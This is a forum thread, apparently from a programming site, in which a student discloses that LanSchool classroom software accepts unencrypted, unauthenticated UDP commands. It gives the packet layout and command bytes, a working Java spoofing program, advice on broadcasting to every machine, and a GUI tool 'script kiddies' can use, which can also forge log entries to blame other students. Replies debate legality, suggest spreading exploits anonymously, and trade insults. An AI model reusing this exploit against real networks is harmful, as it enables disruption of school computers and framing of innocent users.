I'm fairly sure my school/schoolboard have the same thing, but they don't use lanschool. Teachers often 'take control' of your computer, and even more often view what you are doing.

Such harsh replies from LanSchool, would it be too much of a hassle to post your letter to them, and their reply? I wanna read it word for word.

Dan it is illegal to post such exploits.. I think... you have to first let the company "fix" them only then can you publish them... On the other hand you could always widespread the exploits through some annonymous network... This would force the company to "fix" them.. and there's no way to blame it on you.

Actually Dan, rizzix I believe is correct, but it's not really illegal so much as the company could sue you and probably win over it.

Also it should be noted that in canadain hacking cases all hackers who got caugth and where not aucatly derstoying anything or stealing money where senteced to a maxume of 12 moth probation and 2 months of comunity serivce.

US is screwed up, but Canada does give you a criminal record. I'm clean so far hehe, i'd rather stay that way.

Acuatly the laws that made that posiable in the USA where in place since the milnumen act witch makes revice engering software or distrubiting expoites illgeal. As has been stated (like right above this by md) Canada dose not have such laws.

Either way i am not removing it willingly

Canadian Criminal Code Section 342.1 states:
342.1 (1) Every one who, fraudulently and without colour of right,

(a) obtains, directly or indirectly, any computer service,

(b) by means of an electro-magnetic, acoustic, mechanical or other device, intercepts or causes to be intercepted, directly or indirectly, any function of a computer system,

(c) uses or causes to be used, directly or indirectly, a computer system with intent to commit an offence under paragraph (a) or (b) or an offence under section 430 in relation to data or a computer system, or

(d) uses, possesses, traffics in or permits another person to have access to a computer password that would enable a person to commit an offence under paragraph (a), (b) or (c)

is guilty of an indictable offence and liable to imprisonment for a term not exceeding ten years, or is guilty of an offence punishable on summary conviction.

That's why you should save every 2-3 minutes if you want to not lose something. Also, look when the last post in this thread was made.

Normally I would not think of posting such work on this site but this is part of my campaign to get school boards to realize that they should not be using LanSchool and that there are massive security flaws in it.

The Story
During grade 12 I changed schools, the new school I went to have a lot better networks and computer labs which was a good thing, or so I thought. After playing around for a bit I noticed a little green icon in the task bar that did not seem to do anything. Looking feature in to this I found out it was a program named LanSchool (http://www.lanschool.com/). Now what is LanSchool you may ask, the names makes it sound innocent enough, maybe something to help students? Well it may have started out that way but what it has become is basically a Trojan horse program for teachers to use to watch everything you are doing (inducing watching your screen) as well as giving them the ability to control your computer or all computers in the lab at the same time. As usual, the school board decided to spend money on something they could get for free, and got a crapier version then what they could get for free.

So I started looking in to LanSchool more and found a demo version on their site. This demo version could not interact with real versions the school used and would not allow students to do any damage. 1st I looked in to how it was effecting the registry of the computers it was on, and found that every time the teacher application sent a command to the student versions it recorded what windows user sent the command, the windows name of the computer they were on and the time in all registries of every comp on the network. This meant that finding a full version of the software although not hard would end you up in a lot of trouble unless you brought your own computer to school and even then still could.

So I began to look at the packets it was send and to my shock they where UDP and not TCP and they had no encryption or coding at all to them. This means that it is extremely easy to spoof the packets. So I quickly wrote up a simple java program to test out my theory. After some time and experimentation I decided what most of the packets meant and was able to control the demo version of LanSchool. After looking more at the packets I noticed that the differences between the demo version and the real version is that the demo verso uses only one channel which is never used by the real version. So it was simple a matter of changing the channel byte to a real channel in the packet to get it to work with most if not all versions of LanSchool. Also this allowed me to make the registry logs say whatever I wanted, including blaming other students for the hack.

Now being the nice guy that I am I e-mailed my findings to LanSchool and suggested several ways to fix this exploited. There response was basically saying that they would rather spend time and effort enforcing the rules of the school and the law then fixing their program, and made threats that legal action as well as suspensions could take place if I were to use this program. So next I went to my school and actually demonstrated (with their permission) the exploit and how unsecure it was. Again nothing happened with my efforts so a month latter I published how the packet worked on compsci.ca.

It is now almost 2 years later and I have rewritten my hack so any one even script kiddies can use it. With a nice GUI and everything. My hope by doing this is to teach people why programming like LanSchool did is bad security wise and to encourage the school board to buy (if they most) better software from companies that know what they are doing and are willing to change with the times. BTW LanSchools website still claims that there are no know bugs with LanSchool.


The Packet
This is what the packet looks like:

Mode | Version | Channel [to blocks] |00 or DF |DA | D1| ___data here__|__log info__|

Mode is basically the command you are send so far I have found a lot of them and here are some examples:

00 - start broadcast of screens
04 - restore computer screens
07 - blacken all screens
08 - unload lanschool or just freeze it up good


The version corresponds to what version of lanschool you are running versions 5.x seem to like 01 and 02 seems to be for 6.x

the channel area is pretty simple, it is the channel number. The demo version uses channel FF in hex or 255 in deck.

The next 3 bytes are kind of hard to figure out but seem to always be the same in the give version of lanschool. For 5.x and the low 6.xs the 1st byte here should be 00 for 6.5 and some others it should be DF in hex. The other 2 seem to always be the same.

The data area is data for that command; some commands do not need this like blacken all screens.

The log area is where it puts the name of your computer and then your username for logging. This area also has a lot of useless 00 bytes that just take up space.


Application of the above
The following is a very simple java application that will take advantage of the above information to black out screens for the demo version of 6.5 of lanschool only on the computer you are using. To send to all computers in a network you could use the ip 255.255.255.255
Code:

public class LanHack
{
public static void main(String args[])
{
try
{
InetAddress ipaddr=InetAddress.getByName("120.0.0.1");
DatagramSocket mysocket=new DatagramSocket();
byte sendbuf2[] = {(byte)0x07,(byte)0x02,(byte)0xff,(byte)0x3f,(byte)0xda, (byte)0xd1};
DatagramPacket sendPacket2 = new DatagramPacket( sendbuf2, sendbuf2.length, ipaddr, 796);
mysocket.send(sendPacket2);
}catch(Exception e){}
}
}


Note that for lesser version of lanschool you would have to change the 0x3f to 0x00 and possibly 0x02 to 0x01 or another number. Also this is set to the demo channel 0xff and if u wanted to send to a real version you would have to set it to 0xChanNumberInHex.


Lanschool
Now for what I did with all this knowledge to make a point and click lanschool hack that can help you understand how the packets work. Remember that this is only for educational use and should not be used for evil purposes and I take no responsibility for what you do with it. With that side, I only tested it on the demo version but I would like to hear from people if they got it to work on other versions.

How to use
The top frame shows the packet that will be sent, you can use the easy set up buttons below it to set the packet to do what you want. The times bar will let you say how many times you want to send out the packet.

Setting the channel to "ALL" will send to all possible lanschool channels including the demo one. Setting the version to "9" will send a version 2 but with 0x00 rather than 0xdf. Setting to "2" will send version 2 but with 0xdf. All other version numbers send their version and 0x00.

The log info lets you set what to set the name and computer name of in the registry logs of the computers effected. I would strongly recommend people not exploit this to get people in trouble since that is just evil.

You most hit send to actually send the packet. The easy set up buttons just configures the packet you are going to send.

Where to get
A windows executable, executable jar and the java source code have all been included in this post and should appear below. In all cases you need java or a JVM installed.

Lets just sort out the lies from the rest of your good work.

You, sir, are an idiot and simply fail.

Let's just sort out the lies from the rest of your good work. First one right off the bat, you are NOT in 12th grade or beyond. You spell like a first grader. I could barely read what you wrote, it was so bad that even when using a simple spell checker it got overloaded and I had to do about 50 corrections by hand after the 200 by spell checker. You have EVERYTHING wrong. You don't even know how to use the word they're in their house over there. God stay in school. Anyways, since it hurt my eyes so bad, I had to correct it. Please change the versions out before you burn bad grammar/spelling into someone else's eyes too.

Lets just sort out the lies from the rest of your good work.

First one right off the bat. You are NOT in 12th grade or beyond.

You spell like a first grader.

I could barely read what you wrote so bad that even using a simple spell checker got overloaded and I had to do about 50 corrections by hand, 200 by spell checker. You have EVERYTHING wrong.

You don't even know how to use the word they're in their house over there.

God stay in school.

Anyways, since it hurt my eyes so bad, I had to correct it. Please change the versions out before you burn bad grammar/spelling into someone else's eyes too.

For all people here and for Dan
How do you think that I can read your posts, I am learning english now, but I better write than you , please write words correctly because if I don't know some word and it is not writen correctly than I can't find translation in dictionary, so if I can try to write words correctly than you can too.

Sincerely Summer Glau

so if I can try to write words correctly than you can too.